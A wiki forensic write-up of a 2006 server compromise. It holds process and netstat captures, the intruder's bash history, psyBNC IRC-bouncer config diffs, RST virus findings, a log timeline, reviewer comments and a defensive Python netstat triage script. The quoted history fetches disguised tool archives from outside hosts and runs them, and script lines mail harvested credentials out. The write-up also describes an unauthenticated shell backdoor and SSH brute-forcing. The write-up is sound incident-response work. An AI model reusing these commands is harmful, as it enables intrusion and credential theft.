Forensics on Incident 1

From YobiWiki

Breach in ns0 @ e..oss

Analysis

ps auwx, taken 2006/03/17 at about 20:20:
========
test     30731  0.0  0.0   676  284 ?        S    00:21   0:00 ./ntpd
test     31116  0.0  0.2  2944 1360 ?        Ss   00:28   0:00 SCREEN
test     31117  0.0  0.2  3000 1228 pts/5    Ss   00:28   0:00 /bin/bash
test     31134  0.0  0.2  3164 1368 pts/5    S+   00:29   0:00 /bin/bash
test     32352  0.0  0.0  1444  280 ?        Ss   00:43   0:00 ./go
test     25680  0.0  0.2  2944 1412 ?        Ss   09:03   0:00 SCREEN
test     25681  0.0  0.3  3000 1656 pts/6    Ss   09:03   0:00 /bin/bash
test     25717  0.0  0.3  3160 1748 pts/6    S+   09:03   0:00 /bin/bash
test      4132  0.0  0.0  1344  204 pts/5    T+   10:40   0:00 ./go
test      4135  0.0  0.0     0    0 pts/5    Z+   10:40   0:00 [go] <defunct>
test      3211  0.0  0.0  1344  240 pts/5    T+   20:05   0:00 ./go
test      3224  0.0  0.0     0    0 pts/5    Z+   20:05   0:00 [go] <defunct>
test      4088  0.0  0.2  2704 1260 pts/6    S+   20:35   0:00 /bin/bash ./assh 24.35
test      4089 49.4  0.0  1492  456 pts/6    R+   20:35   4:43 ./pscan2 24.35 22
test      4090  0.0  0.0     0    0 pts/6    Z+   20:35   0:00 [pscan2] <defunct>
test      4097  0.0  0.2  2704 1260 pts/5    S+   20:35   0:00 /bin/bash ./assh 200.56
test      4098 49.4  0.0  1492  456 pts/5    R+   20:35   4:43 ./pscan2 200.56 22
test      4099  0.0  0.0     0    0 pts/5    Z+   20:35   0:00 [pscan2] <defunct>


Screens:
========
test@ns0:/root$ screen -ls
screen -r test/
There are screens on:
        31116.pts-4.ns0 (Detached)
        25680.pts-4.ns0 (Detached)
2 Sockets in /var/run/screen/S-test.

test@ns0:/root$ screen -r 31116

First screen:
=============
Copy of the current page:

bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.58.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 200.59.112.* (total: 0) (43.9% done)

Second screen:
==============
Copy of the full screen buffer:

test@ns0:/var/tmp/..  /dan$
test@ns0:/var/tmp/..  /dan$ ls
200               assh    gen-pass.sh  pass_file  sshf
200.221.pscan.22  auto    go           pscan2     ssh-scan
200.59.pscan.22   common  go.sh        ss         vuln.txt



bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.37.255.* (total: 0) (100.0% done)
# pscan completed in 820 seconds. (found 0 ips)
# Cam putin : 0 de servere
----------------------------------------
# Se apropie sfarsitu :P
Fii pe faza Dane..
ping: unknown host www.yahoo.com
Toata dragostea mea pentru diavola!!!!!!
bind: Address already in use
Norok in continuare
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
# Incep sa scanez IPuri
# scanning: 24.38.136.* (total: 0) (53.3% done)


test@ns0:/var/tmp/..  /2$ ./auto

Enter A class range
24
Enter output file
24
test@ns0:/var/tmp/..  /2$ chmod +x 24
test@ns0:/var/tmp/..  /2$ ./24
######################################################
#                Compiled By D-a-N                   #
#----------------------------------------------------#
#                  Scaner Privat                     #
#----------------------------------------------------#
######################################################
...


Bash history:
=============
Ran history in screen 25680.pts-4.ns0:
test@ns0:/var/tmp/..  /2$ history
The first 48 lines are identical to .bash_history, then:
   49  ./auto
   50  chmod +x 24
   51  ./24

Content of .bash_history:
ls
cd
ls
wget
wget rzv69.marte.ro/rzv69.tgz
tar zxvf rzv69.tgz
ls
del 404
wget fire.prohosting.com/claubuc/scaner.jpg
tar xzvf scaner.jpg
cd scaner
./assh 207.44
ls
./auto 207.44
./assh 213.186
cd /var/tmp
cd .."  "
screen
w
passwd
w
cd /var/tmp
ls -a
cd /home/test/
ls -a
cd scaner
ls -a
cat vuln.txt
cd /var/tmp
cat /etc/hosts
su vinoj
su vinoj
su trollingsecours
su trollingsecours
su trollingsecours
cd /var/tmp
ls -a
mkdir .."  "
cd .."  "
wget fire.prohosting.com/scarlatu/dan.jpg
wget fire.prohosting.com/scarlatu/psy.jpg
tar xzvf psy.jpg
cd .bash
./ntpd
cd ..
tar xzvf dan.jpg
cd dan
screen
ls -a
./go.sh 200.41
./assh 200.41
exit
w
screen -r
screen -r 30860.pts-2.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .."  "
cd dan
pico vuln.txt
rm -rf vuln.txt
touch vuln.txt
cd ..
tar xzvf dan.jpg
ls -a
cd dan
ls -a
cd ..
mv dan 1
tar xzvf dan.jpg
mv dan 2
mv 1 dan
ls -a
cd 2
screen
screen -r
screen -r 30860.pts-2.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r  25680.pts-4.ns0
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
cd /var/tmp
cd .."  "
cd 2
pico vuln.txt
cd ..
cd dan
pico vuln.txt
cat vuln.txt
clear
w
screen -r
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
ls -a
cd /var/tmp
cd .."  "
cd dan
vi vuln.txt
cd /var/tmp
cd .."  "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
cd /var/tmp
cd .." "
cd .."  "
cd dan
vi vuln.txt
ls -a
cd ..
cd 2
vi vuln.txt
ls -a
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 25680.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
ftp
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
w
screen -r
screen -r 31116.pts-4.ns0
screen -r 25680.pts-4.ns0
crontab -e

Tools:
======
* Attempt to download rzv69.marte.ro/rzv69.tgz, failed with a 404
* Download tools from fire.prohosting.com/claubuc/scaner.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/dan.jpg (tgz)
* Download tools from fire.prohosting.com/scarlatu/psy.jpg (tgz)
* Scripts with Romanian messages
* Banner: Compiled By D-a-N
* Results are mailed out by the scripts:
    cat log|mail -s 'linux-printer' usdpower@yahoo.com (dan tools)
    cat log|mail -s 'linux-printer' scaneru_meu@yahoo.com (scaner tools)

Scans:
======
* SSH (port 22) scans of the ranges 200.55 200.58 200.59 24.34 24.37 24.38 207.44 213.186
Netstat extract (a few of the roughly 800 simultaneous connection attempts):
tcp        0      1 213.186.53.59:59930     24.35.236.71:22         SYN_SENT   4089/pscan2
tcp        0      1 213.186.53.59:60352     200.56.236.93:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60288     200.56.236.29:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60424     200.56.236.165:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60233     200.56.235.229:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60169     200.56.235.165:22       SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60095     200.56.235.91:22        SYN_SENT   4098/pscan2


IRC:
====
* IRC connection (port 6667) through psyBNC, running under the name "ntpd", to 195.204.1.130
** 195.204.1.130 = oslo1.no.eu.undernet.org
Netstat:
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN     30731/ntpd
tcp        0      0 213.186.53.59:34227     195.204.1.130:6667      ESTABLISHED30731/ntpd

Diffs between the downloaded tool and the hacker's version:

--- log/psybnc.log	1970-01-01 01:00:00.000000000 +0100
+++ log/psybnc.log	2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,15 @@
+Fri Mar 17 00:21:14 :Listener created :0.0.0.0 port 6667
+Fri Mar 17 00:21:14 :psyBNC2.3BETA-cBtITLdDMSNp started (PID :30731)
+Fri Mar 17 00:21:14 :Loading all Users..
+Fri Mar 17 00:21:14 :No Users found.
+Fri Mar 17 00:21:29 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:21:31 :Lost Connection from 209-NAT.s-man.net (dan)
+Fri Mar 17 00:22:31 :connect from 209-NAT.s-man.net
+Fri Mar 17 00:22:39 :Noul User:dan (x) a fsot adaugat de  dan
+Fri Mar 17 00:22:48 :User dan () nu are nici un server adaugat
+Fri Mar 17 00:23:05 :User dan () trying lelystad.nl.eu.undernet.org port 6667 ().
+Fri Mar 17 00:23:05 :User dan () connected to lelystad.nl.eu.undernet.org:6667 ()
+Fri Mar 17 00:23:27 :Userul dan () A fost deconectat(de la lelystad.nl.eu.undernet.org) motivul: Closing Link: D4aNieL by Lelystad.NL.EU.UnderNet.Org (K-lined)
+Fri Mar 17 00:23:42 :User dan () trying 195.204.1.130 port 6667 ().
+Fri Mar 17 00:23:43 :User dan () connected to 195.204.1.130:6667 ()
+Fri Mar 17 00:30:35 :User dan quitted (from 209-NAT.s-man.net)
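Review bot: the 1970-01-01 timestamp on the "---" side of this hunk means log/psybnc.log does not exist in the pristine download, so all fifteen added lines were produced on ns0; the write-up should say so and cross-reference the second line's "PID :30731" with the ./ntpd entry in the ps listing and the netstat LISTEN/ESTABLISHED lines, since that is what proves the "ntpd" process is this psyBNC instance. The "connect from 209-NAT.s-man.net" lines also match the rhost of the 00:18 sshd failures for croulants in the timeline, and the 00:23:27 line shows the nick D4aNieL was K-lined at lelystad before the bouncer moved on to 195.204.1.130.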

--- motd/USER1.MOTD	1970-01-01 01:00:00.000000000 +0100
+++ motd/USER1.MOTD	2006-03-19 23:32:53.000000000 +0100
@@ -0,0 +1,71 @@
+:Oslo1.NO.EU.undernet.org 001 D4aNieL :Welcome to the UnderNet IRC Network, D4aNieL

+:Oslo1.NO.EU.undernet.org 002 D4aNieL :Your host is Oslo1.NO.EU.undernet.org, running version u2.10.11.07

+:Oslo1.NO.EU.undernet.org 003 D4aNieL :This server was created Mon Sep 5 2005 at 01:40:32 CEST

+:Oslo1.NO.EU.undernet.org 004 D4aNieL Oslo1.NO.EU.undernet.org u2.10.11.07 dioswkgx biklmnopstvr bklov

+:Oslo1.NO.EU.undernet.org 005 D4aNieL WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE SILENCE=15 MODES=6 MAXCHANNELS=30 MAXBANS=45 NICKLEN=12 MAXNICKLEN=15 :are supported by this server

+:Oslo1.NO.EU.undernet.org 005 D4aNieL TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,imnpstr CASEMAPPING=rfc1459 NETWORK=UnderNet :are supported by this server

+:Oslo1.NO.EU.undernet.org 251 D4aNieL :There are 31261 users and 80486 invisible on 28 servers

+:Oslo1.NO.EU.undernet.org 252 D4aNieL 82 :operator(s) online

+:Oslo1.NO.EU.undernet.org 253 D4aNieL 237 :unknown connection(s)

+:Oslo1.NO.EU.undernet.org 254 D4aNieL 42167 :channels formed

+:Oslo1.NO.EU.undernet.org 255 D4aNieL :I have 7253 clients and 1 servers

+:Oslo1.NO.EU.undernet.org 375 D4aNieL :- Oslo1.NO.EU.undernet.org Message of the Day -

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- 2005-12-16 5:48

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Welome to Oslo*.NO.EU.undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Disclaimer / Rules

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Irc is an umoderated international medium. Cloning is

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         strictly forbidden on this server, any clones will

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         not be tolerated. Mass Messaging / Mass Invites are not

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         allowed on any Undernet server, any offenders will be killed.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Using this server means you agree to all of its rules and the

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         rules of Undernet. If you cannot agree to this then /quit now.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Server contact info:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         E-mail     : oslo@undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     News:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [12.05.2005]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We are out of news.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [12.12.2004]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We shut down the channel #banetele. Most of the users in there needed

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         reop/channel related helping and we have #nastrand for that. For info

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         not related to channel/user problems, email oslo@undernet.org.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         [26.08.2003]

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         We are back online :)

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Thank you to our provider www.banetele.com for all help!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Ports:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-                 6666, 6667, 6668, 7000

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Bot Policies:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         It is allowed to run NON abusive bots on this server, all abusive

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         bots will be killed on sight.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Undernet has Cservice. Go to http://cservice.undernet.org

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         or #Cservice if you have any questions.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     Help Channels:

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #nastrand       ->      Oper/IRC Help

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #cservice       ->      Cservice questions

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #mIRC           ->      For mIRC questions

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #vh             ->      For help with viruses

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         #helpchan       ->      IRC Help

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         Please notice that these channels are not administrated by the

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         oslo.* crew and we and/or the server sponsors can not be held

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         responsible for actions taken or info given in the channels.

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :- ==>     AGAIN .. READ THIS !!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         NO CLONES, NO FLOODING, NO HARASSING, NO SPAMMING!

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         The use of this server is no right, but a privilege. The admin(s)

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         and opers can revoke this priviledge without further notice and

+:Oslo1.NO.EU.undernet.org 372 D4aNieL :-         without a reason.

+:Oslo1.NO.EU.undernet.org 376 D4aNieL :End of /MOTD command.
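Review bot: this hunk is the verbatim Undernet greeting and MOTD stored by the bouncer, and the only lines that add to the investigation are the 001 to 005 numerics, which confirm that the server behind 195.204.1.130 is Oslo1.NO.EU.undernet.org and that the attacker's nick is D4aNieL; consider quoting just those and the closing 376 line, with a sentence saying what the rest is, rather than the full 71-line MOTD.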


--- psybnc.conf	2003-04-07 14:47:00.000000000 +0200
+++ psybnc.conf	2006-03-19 23:32:53.000000000 +0100
@@ -1,3 +1,25 @@
 PSYBNC.SYSTEM.PORT1=6667
 PSYBNC.SYSTEM.HOST1=*

 PSYBNC.HOSTALLOWS.ENTRY0=*;*

+USER1.USER.LOGIN=dan
+USER1.USER.USER=x
+USER1.USER.PASS==0x'q'0'W`2'S0I'F`x
+USER1.USER.RIGHTS=1
+USER1.USER.VLINK=0
+USER1.USER.PPORT=0
+USER1.USER.PARENT=0
+USER1.USER.QUITTED=0
+USER1.USER.DCCENABLED=1
+USER1.USER.AUTOGETDCC=0
+USER1.USER.AIDLE=0
+USER1.USER.LEAVEQUIT=0
+USER1.USER.AUTOREJOIN=1
+USER1.USER.SYSMSG=1
+USER1.USER.LASTLOG=0
+USER1.USER.NICK=D-a-N
+USER1.SERVERS.SERVER1=lelystad.nl.eu.undernet.org
+USER1.SERVERS.PORT2=6667
+USER1.SERVERS.SERVER2=195.204.1.130
+USER1.SERVERS.PORT1=6667
+USER1.CHANNELS.ENTRY1=#porumbei
+USER1.CHANNELS.ENTRY0=#xibit
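Review bot: the two unchanged context lines PSYBNC.SYSTEM.HOST1=* and PSYBNC.HOSTALLOWS.ENTRY0=*;* are stock settings and are what makes the bouncer accept clients from any address on 0.0.0.0:6667, which is the LISTEN socket shown in the IRC section; worth stating so the listener is not read as a second backdoor. In the added block, USER1.USER.PASS==... is psyBNC's encrypted password form (the leading "="), not a recoverable plaintext; USER1.SERVERS.SERVER1/SERVER2 match the two connection attempts in the psybnc.log hunk, and USER1.USER.NICK=D-a-N together with the channels #porumbei and #xibit are the attacker identifiers worth recording alongside the "Compiled By D-a-N" banner.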


Backdoor:
=========
* ./go listens on port 19876 and gives a shell with no authentication
cf http://www.2701.org/archive/200311240000.html
Netstat:
tcp        0      0 0.0.0.0:19876           0.0.0.0:*               LISTEN     32352/go

* ./ss
cf http://www.securiteam.com/tools/5EP0B0ADFO.html
Fast SYN Scanner (libnet, libpcap)  11 Jul. 2004
Credit:
The information has been provided by Doctor BIOS.
The following tool is a fast SYN scanner written in C.
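The netstat excerpts in the Scans, IRC and Backdoor sections all show the same thing: a process name that does not fit its socket. As an added example (not part of this write-up), here is a small Python triage run over those very lines, flagging a daemon name listening on a port it should not own, a listener with no known daemon behind it, and a PID with many half-open connections to one remote port; the expected-port baseline is a hypothetical placeholder that a site would fill from its own inventory.

```python
import re
from collections import defaultdict

# netstat -anp lines copied from the Scans, IRC and Backdoor sections of this write-up.
# "ESTABLISHED30731/ntpd" keeps netstat's real column overflow: the parser must cope with it.
NETSTAT_SAMPLE = """\
tcp        0      1 213.186.53.59:59930     24.35.236.71:22         SYN_SENT   4089/pscan2
tcp        0      1 213.186.53.59:60352     200.56.236.93:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60288     200.56.236.29:22        SYN_SENT   4098/pscan2
tcp        0      1 213.186.53.59:60424     200.56.236.165:22       SYN_SENT   4098/pscan2
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN     30731/ntpd
tcp        0      0 213.186.53.59:34227     195.204.1.130:6667      ESTABLISHED30731/ntpd
tcp        0      0 0.0.0.0:19876           0.0.0.0:*               LISTEN     32352/go
"""

LINE_RE = re.compile(
    r"^tcp\s+\d+\s+\d+\s+"
    r"(?P<laddr>[\d.]+):(?P<lport>\d+)\s+"
    r"(?P<raddr>[\d.]+):(?P<rport>\d+|\*)\s+"
    r"(?P<state>[A-Z_]+)\s*"          # \s*: a long state name can run into the PID column
    r"(?P<pid>\d+)/(?P<prog>\S+)"
)

# Hypothetical baseline for this example: TCP ports each daemon name may legitimately own.
# ntpd gets an empty set because NTP is UDP/123; an "ntpd" holding a TCP listener is not ntpd.
EXPECTED_TCP_PORTS = {"ntpd": set(), "sshd": {22}, "exim4": {25}, "apache2": {80, 443}}


def parse_netstat(text):
    """Parse the IPv4 TCP rows of `netstat -anp` output into dicts; other rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        r = m.groupdict()
        r["lport"], r["pid"] = int(r["lport"]), int(r["pid"])
        r["rport"] = None if r["rport"] == "*" else int(r["rport"])
        rows.append(r)
    return rows


def triage(text, syn_threshold=3):
    """Flag listeners that do not fit the baseline, and PIDs with at least
    syn_threshold half-open connections to one remote port (the pscan2 pattern)."""
    rows = parse_netstat(text)
    findings = []
    for r in rows:
        if r["state"] != "LISTEN":
            continue
        if r["prog"] not in EXPECTED_TCP_PORTS:
            findings.append(("unknown-listener", r["pid"], r["prog"], r["lport"]))
        elif r["lport"] not in EXPECTED_TCP_PORTS[r["prog"]]:
            findings.append(("masquerading-listener", r["pid"], r["prog"], r["lport"]))
    half_open = defaultdict(set)          # (pid, prog, remote port) -> distinct targets
    for r in rows:
        if r["state"] == "SYN_SENT":
            half_open[(r["pid"], r["prog"], r["rport"])].add(r["raddr"])
    for (pid, prog, rport), targets in half_open.items():
        if len(targets) >= syn_threshold:
            findings.append(("outbound-scan", pid, prog, rport, len(targets)))
    return findings


if __name__ == "__main__":
    for finding in triage(NETSTAT_SAMPLE):
        print(*finding)
```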

vuln.txt:
=========
cf http://www.lockeddown.net/rst-expl.txt

ssh brute-force:
================
ssh-scan and sshf

./sshf <procese adika cate de alea deodata incerc>
(the Romanian argument description means roughly: how many processes to run at once)

/etc/passwd:
============
test:x:1024:1024:,,,:/home/test:/bin/false

mails:
======
cat /etc/passwd
/sbin/ifconfig |grep inet
cat /etc/hosts
uname -a
w
ping -c 3 www.yahoo.com
cat vuln.txt
chmod +x go
./go

139P Received: from test by ns0.exxoss.com with local (Exim 4.50)
	for usdpower@yahoo.com; Fri, 17 Mar 2006 17:35:14 +0100
023T To: usdpower@yahoo.com
023  Subject: linux-printer
047I Message-Id: <E1FKHv0-0008GG-4C@ns0.exxoss.com>
034F From: ",,," <test@ns0.exxoss.com>
038  Date: Fri, 17 Mar 2006 17:35:14 +0100

Data queued to be mailed out (harvested user:password:IP triples):
(one host accepted every root password tried: probably a honeypot)

RST virus:
==========
Quick and dirty way to find infected files: find . -type f -exec strings --all {} \; |grep snortdos

Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/scaner/go  Infection: Unix/RST.B
/tmp/scaner/pscan2  Infection: Unix/RST.B
/tmp/scaner/ss  Infection: Unix/RST.B
/tmp/scaner/ssh-scan  Infection: Unix/RST.B
/tmp/scaner/sshf  Infection: Unix/RST.B
Results of virus scanning:
Infected: 5

The infected binaries seem to rewrite themselves at each run, which updates their timestamps:
/home/test/scaner:
  23714 2006-03-06 23:23 go
  25503 2005-05-06 19:00 pscan2
 458068 2006-03-07 00:03 ss
 846520 2006-03-07 00:03 sshf
 846832 2006-03-06 23:12 ssh-scan
/var/tmp/..  /2:
  23714 2006-03-17 21:17 go
  25503 2006-03-17 21:17 pscan2
 458068 2006-03-17 21:17 ss
 846520 2006-03-17 21:17 sshf
 846832 2006-03-17 21:17 ssh-scan
/var/tmp/..  /dan:
  23714 2006-03-17 10:35 go
  25503 2006-03-17 21:17 pscan2
 458068 2006-03-17 21:17 ss
 846520 2006-03-17 21:17 sshf
 846832 2006-03-17 21:17 ssh-scan

21:17 is the time of the server crash, so the infected executables were probably still held open even after their processes had been killed.

Note: the same virus is also present in:
/ns0/var/www/www.fmjbf.org/phpSecurePages/bindtty2: Linux.RST.B FOUND
/ns0/var/www/www.fmjbf.org/phpSecurePages/btty: Linux.RST.B FOUND



TIMELINE:
=========

2006/02/16 08:58:08	82.79.137.30		vsftpd: Thu Feb 16 08:58:08 2006 [pid 23877] [demo] FAIL LOGIN: Client 		"82.79.137.30"
						Mar  6 12:28:21 localhost sshd[31087]: error: PAM: Authentication failure for skycode from 193.190-200-80.adsl.skynet.be
						Mar  6 12:28:24 localhost sshd[31087]: Accepted keyboard-interactive/pam for skycode from 80.200.190.193 port 13329 ssh2
						Mar  6 12:29:31 localhost sudo:  skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
						Mar 06 06 12:30:50     4096 m.c drwxr-xr-x root     root     /etc/webmin
			            				        639 m.c -rw------- root     root     /etc/webmin/miniserv.conf
						Mar  6 12:31:05 localhost webmin[31297]: Webmin starting
						Mar  6 12:31:13 localhost webmin[31307]: Successful login as root from 193.190-200-80.adsl.skynet.be
2006/03/06 13:48:47	82.79.137.24	*	vsftpd: Mon Mar  6 13:48:47 2006 [pid 4586] [test] OK LOGIN: Client 		"82.79.137.24"
						Mar 03 06 15:53:30       21 m.c -rw-r----- root     shadow   /etc/webmin/miniserv.users
						Mar 03 06 16:11:31     4096 m.c drwxr-xr-x root     root     /etc/exim4
		    			    	                   7838 m.c -rw-r--r-- root     root     /etc/exim4/exim4.conf
						Mar  6 17:59:47 localhost sshd[22697]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 11272 ssh2
						Mar  6 19:43:12 localhost sshd[32573]: Accepted publickey for dorian1200 from 217.117.45.148 port 49764 ssh2
						Mar  6 19:43:17 localhost sudo: dorian1200 : TTY=pts/4 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
						Mar  6 20:22:42 localhost sshd[3285]: Accepted keyboard-interactive/pam for skycode from 80.201.157.39 port 12754 ssh2
						dorian12 pts/2        217.117.45.148   Mon Mar  6 21:38 - 21:40  (00:01)
						Mar  6 21:38:37 localhost sshd[10242]: Accepted publickey for dorian1200 from 217.117.45.148 port 44246 ssh2
						Mar  6 21:38:44 localhost sudo: dorian1200 : TTY=pts/2 ; PWD=/home/dorian1200 ; USER=root ; COMMAND=/bin/bash
2006/03/06 22:27:30	82.79.137.26		26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:30 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:27:31	82.79.137.26		26.metronetwork.rdsbz.ro - - [06/Mar/2006:22:27:31 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.56/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "-"
2006/03/06 22:28:16	82.79.137.27		Mar  6 22:28:16 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/06 22:28:18	82.79.137.27		vsftpd: Mon Mar  6 22:28:18 2006 [pid 14875] [anonymous] FAIL LOGIN: Client 	"82.79.137.27"
2006/03/06 22:28:18	82.79.137.18		Mar  6 22:28:18 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.18
2006/03/06 22:28:20	82.79.137.18		vsftpd: Mon Mar  6 22:28:20 2006 [pid 14881] [anonymous] FAIL LOGIN: Client 	"82.79.137.18"
2006/03/06 22:28:29	82.79.137.25	*	vsftpd: Mon Mar  6 22:28:29 2006 [pid 14911] [test] OK LOGIN: Client 		"82.79.137.25"
2006/03/06 22:28:30	82.79.137.14	*	vsftpd: Mon Mar  6 22:28:30 2006 [pid 14914] [test] OK LOGIN: Client 		"82.79.137.14"
2006/03/06 22:28:39	82.79.137.22		Mar  6 22:28:39 localhost sshd[14930]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=22.metronetwork.rdsbz.ro  user=test
2006/03/06 22:28:41	82.79.137.22		Mar  6 22:28:41 localhost sshd[14924]: error: PAM: Authentication failure for test from 22.metronetwork.rdsbz.ro
2006/03/06 22:28:43	82.79.137.22 	*	Mar  6 22:28:43 localhost sshd[14924]: Accepted keyboard-interactive/pam for test from 82.79.137.22 port 1383 ssh2
2006/03/06 22:28:43	82.79.137.22	*	Mar  6 22:28:43 localhost sshd[14934]: (pam_unix) session opened for user test by (uid=0)
2006/03/06 22:28	82.79.137.22	*	test   pts/2        82.79.137.22     Mon Mar  6 22:28 - 00:21  (01:52)
2006/03/06 22:31:06	82.79.137.18		Mar  6 22:31:06 localhost sshd[15200]: Illegal user asd from 82.79.137.18
2006/03/06 23:29:14	82.79.137.7	*	vsftpd: Mon Mar  6 23:29:14 2006 [pid 20547] [test] OK LOGIN: Client 		"82.79.137.7"
